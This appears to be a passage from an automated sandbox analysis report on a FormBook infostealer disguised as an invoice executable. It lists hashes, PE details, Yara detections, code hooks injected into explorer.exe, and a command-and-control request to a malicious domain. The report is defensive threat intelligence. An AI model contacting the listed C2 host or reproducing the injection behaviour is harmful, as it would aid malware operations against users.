http://www.fontbureau.com/designers/	#6495PI-29458-2020.exe, 00000000.00000003.345121242.000000000108B000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm92	#6495PI-29458-2020.exe, 00000000.00000003.347449500.00000000054E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.169.219.94	ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452525
Start date:	22.07.2021
Start time:	14:40:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 41s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	#6495PI-29458-2020.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.8% (good quality ratio 7.5%) Quality average: 68.8% Quality standard deviation: 34.8%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.193.48, 23.211.6.115, 13.64.90.137, 20.50.102.62, 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.112.88.60, 20.82.210.154, 80.67.82.235, 80.67.82.211, 23.211.4.86 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/452525/sample/#6495PI-29458-2020.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54.169.219.94	LPY15536W4.exe	Get hash	malicious	Browse	www.ashestore.site/wufn/?4h=ISgUE+y8at+oK8dHcsoJQrgsUIy+PQnmT8QKJ9JsEEMUv/NijjA4F8tqTvvbzlVwEyqpXFZ0JA==&k410=d8nPSBn8y43

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com	LPY15536W4.exe	Get hash	malicious	Browse	54.169.219.94
	order PI specification N0-00128835%%.exe	Get hash	malicious	Browse	3.1.135.107

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	Statement SKBMT 09818.jar	Get hash	malicious	Browse	75.2.26.18
	DCBR.msi	Get hash	malicious	Browse	18.228.5.161
	NQBNpLezqZKv1P4.exe	Get hash	malicious	Browse	46.137.146.55
	kkXJRT8vEl.exe	Get hash	malicious	Browse	52.217.42.228
	kS2dqbsDwD.exe	Get hash	malicious	Browse	52.217.201.169
	Nb2HQZZDIf.exe	Get hash	malicious	Browse	52.216.94.27
	ovLjmo5UoE	Get hash	malicious	Browse	63.34.62.30
	o3ZUDIEL1v	Get hash	malicious	Browse	18.151.13.78
	D1dU3jQ1II	Get hash	malicious	Browse	34.208.242.240
	mal.exe	Get hash	malicious	Browse	52.58.78.16
	vjsBNwolo9.js	Get hash	malicious	Browse	76.223.26.96
	r3xwkKS58W.exe	Get hash	malicious	Browse	52.217.135.113
	A7X93JRxhp	Get hash	malicious	Browse	54.151.74.14
	1Ds9g7CEsp	Get hash	malicious	Browse	13.208.189.104
	XuQRPW44hi	Get hash	malicious	Browse	54.228.23.118
	Taf5zLti30	Get hash	malicious	Browse	44.231.84.110
	5qpsqg7U0G	Get hash	malicious	Browse	34.219.219.82
	LyxN1ckWTW	Get hash	malicious	Browse	18.139.244.68
	ZlvFNj.dll	Get hash	malicious	Browse	3.16.22.120
	U4r9W64doy	Get hash	malicious	Browse	13.245.89.196

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#6495PI-29458-2020.exe.log Download File
Process:	C:\Users\user\Desktop\#6495PI-29458-2020.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.102343229431638
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	#6495PI-29458-2020.exe
File size:	941056
MD5:	020c3201638570f2858099e3e522a9a0
SHA1:	c3977925522b50fc59c2d2e1e014e24052d36fce
SHA256:	24e635e80cecd03066225b27fdb524c4542586b22dc820e05f8a02072008c674
SHA512:	11455186a0f8d4ad74de60cb4fa2acf399c8c39887ef979fa5b3d2568b530bc5d8c91c70dd3a7621df9e37ba3b1360fe38201146ed39dc185b03656a2ff8e173
SSDEEP:	12288:EevfpBhp6/J8jv5kD7D8i9Tjo/REzfzxuynJ14SMPQipP56:fvxB6h65kvD8A0/RAipg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0..t............... ........@.. ....................................@................................

File Icon


Icon Hash:	f0debeffdffeec70

Static PE Info

General
Entrypoint:	0x48921e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60F8E8A3 [Thu Jul 22 03:40:19 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x891c4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x5e320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xea000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x87224	0x87400	False	0.863985241451	data	7.7536017706	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x5e320	0x5e400	False	0.167331523541	data	5.64057603036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xea000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x8a220	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0x8a688	0x1128	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON	0x8b7b0	0x2668	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON	0x8de18	0x4428	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON	0x92240	0x11028	dBase III DBT, version number 0, next free block index 40
RT_ICON	0xa3268	0x44028	data
RT_GROUP_ICON	0xe7290	0x5a	data
RT_VERSION	0xe72ec	0x30c	data
RT_MANIFEST	0xe75f8	0xd25	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2016
Assembly Version	1.0.0.0
InternalName	iH1Ql.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	uNotepad
ProductVersion	1.0.0.0
FileDescription	uNotepad
OriginalFilename	iH1Ql.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:43:14.306770086 CEST	49746	80	192.168.2.6	54.169.219.94
Jul 22, 2021 14:43:14.489640951 CEST	80	49746	54.169.219.94	192.168.2.6
Jul 22, 2021 14:43:14.489804983 CEST	49746	80	192.168.2.6	54.169.219.94
Jul 22, 2021 14:43:14.511452913 CEST	49746	80	192.168.2.6	54.169.219.94
Jul 22, 2021 14:43:14.693845034 CEST	80	49746	54.169.219.94	192.168.2.6
Jul 22, 2021 14:43:14.696037054 CEST	80	49746	54.169.219.94	192.168.2.6
Jul 22, 2021 14:43:14.696069002 CEST	80	49746	54.169.219.94	192.168.2.6
Jul 22, 2021 14:43:14.696312904 CEST	49746	80	192.168.2.6	54.169.219.94
Jul 22, 2021 14:43:14.696405888 CEST	49746	80	192.168.2.6	54.169.219.94
Jul 22, 2021 14:43:14.880146980 CEST	80	49746	54.169.219.94	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:41:10.704257011 CEST	54513	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:10.753595114 CEST	53	54513	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:12.194401979 CEST	62044	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:12.251405001 CEST	53	62044	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:13.136104107 CEST	63791	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:13.195770979 CEST	53	63791	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:13.436727047 CEST	64267	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:13.495524883 CEST	53	64267	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:16.541152000 CEST	49448	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:16.591412067 CEST	53	49448	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:17.430366993 CEST	60342	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:17.482566118 CEST	53	60342	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:18.268505096 CEST	61346	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:18.329919100 CEST	53	61346	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:19.078941107 CEST	51774	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:19.130829096 CEST	53	51774	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:21.021473885 CEST	56023	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:21.070998907 CEST	53	56023	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:23.571568966 CEST	58384	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:23.631350994 CEST	53	58384	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:24.438795090 CEST	60261	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:24.489110947 CEST	53	60261	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:25.297189951 CEST	56061	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:25.354202986 CEST	53	56061	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:26.500303030 CEST	58336	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:26.552627087 CEST	53	58336	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:27.299494028 CEST	53781	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:27.349906921 CEST	53	53781	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:28.586159945 CEST	54064	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:28.636842012 CEST	53	54064	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:29.436491013 CEST	52811	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:29.493817091 CEST	53	52811	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:30.638916969 CEST	55299	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:30.688970089 CEST	53	55299	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:31.807440042 CEST	63745	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:31.858817101 CEST	53	63745	8.8.8.8	192.168.2.6
Jul 22, 2021 14:41:46.428426027 CEST	50055	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:41:46.488549948 CEST	53	50055	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:05.285996914 CEST	61374	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:05.345901012 CEST	53	61374	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:06.175352097 CEST	50339	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:06.318123102 CEST	53	50339	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:07.064289093 CEST	63307	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:07.163542986 CEST	53	63307	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:07.167327881 CEST	49694	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:07.239905119 CEST	53	49694	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:08.005673885 CEST	54982	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:08.065845013 CEST	53	54982	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:08.649089098 CEST	50010	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:08.706372023 CEST	53	50010	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:09.607615948 CEST	63718	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:09.667239904 CEST	53	63718	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:10.265831947 CEST	62116	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:10.324459076 CEST	53	62116	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:11.206458092 CEST	63816	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:11.266272068 CEST	53	63816	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:12.311192036 CEST	55014	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:12.361753941 CEST	53	55014	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:14.074523926 CEST	62208	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:14.134105921 CEST	53	62208	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:14.652688026 CEST	57574	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:14.713018894 CEST	53	57574	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:21.469476938 CEST	51818	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:21.539720058 CEST	53	51818	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:23.335885048 CEST	56628	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:23.394099951 CEST	53	56628	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:26.173472881 CEST	60778	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:26.232645035 CEST	53	60778	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:46.236995935 CEST	53799	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:46.309489965 CEST	53	53799	8.8.8.8	192.168.2.6
Jul 22, 2021 14:42:57.759448051 CEST	54683	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:42:57.841471910 CEST	53	54683	8.8.8.8	192.168.2.6
Jul 22, 2021 14:43:00.236851931 CEST	59329	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:43:00.297167063 CEST	53	59329	8.8.8.8	192.168.2.6
Jul 22, 2021 14:43:13.890517950 CEST	64021	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:43:14.263108015 CEST	53	64021	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 14:43:13.890517950 CEST	192.168.2.6	8.8.8.8	0xd87c	Standard query (0)	www.hoatao.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 22, 2021 14:43:14.263108015 CEST	8.8.8.8	192.168.2.6	0xd87c	No error (0)	www.hoatao.xyz	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 14:43:14.263108015 CEST	8.8.8.8	192.168.2.6	0xd87c	No error (0)	dns.ladipage.com	ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 14:43:14.263108015 CEST	8.8.8.8	192.168.2.6	0xd87c	No error (0)	ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com		54.169.219.94	A (IP address)	IN (0x0001)
Jul 22, 2021 14:43:14.263108015 CEST	8.8.8.8	192.168.2.6	0xd87c	No error (0)	ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com		52.74.68.242	A (IP address)	IN (0x0001)
Jul 22, 2021 14:43:14.263108015 CEST	8.8.8.8	192.168.2.6	0xd87c	No error (0)	ladi-dns-ssl-nlb-prod-2-d9215092a8318d52.elb.ap-southeast-1.amazonaws.com		3.1.135.107	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.hoatao.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49746	54.169.219.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:43:14.511452913 CEST	6553	OUT	GET /wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7+l+fr5rYWJObsKdpXRzMG7/vctLDNQEZfSzrEr5AJ0mQFbfi1yOCsf5g== HTTP/1.1 Host: www.hoatao.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:43:14.696037054 CEST	6553	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Thu, 22 Jul 2021 12:43:14 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.hoatao.xyz/wt5i/?q0DD6=2dfL90cX&8pjDV6=tXijk4hnD7izr0wZK7+l+fr5rYWJObsKdpXRzMG7/vctLDNQEZfSzrEr5AJ0mQFbfi1yOCsf5g== Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEB

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: #6495PI-29458-2020.exe PID: 5040 Parent PID: 5780

General

Start time:	14:41:18
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\#6495PI-29458-2020.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\#6495PI-29458-2020.exe'
Imagebase:	0x520000
File size:	941056 bytes
MD5 hash:	020C3201638570F2858099E3E522A9A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.442703762.00000000039A1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: #6495PI-29458-2020.exe PID: 4372 Parent PID: 5040

General

Start time:	14:42:07
Start date:	22/07/2021
Path:	C:\Users\user\Desktop\#6495PI-29458-2020.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xea0000
File size:	941056 bytes
MD5 hash:	020C3201638570F2858099E3E522A9A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.496436603.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.496991473.0000000001810000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, 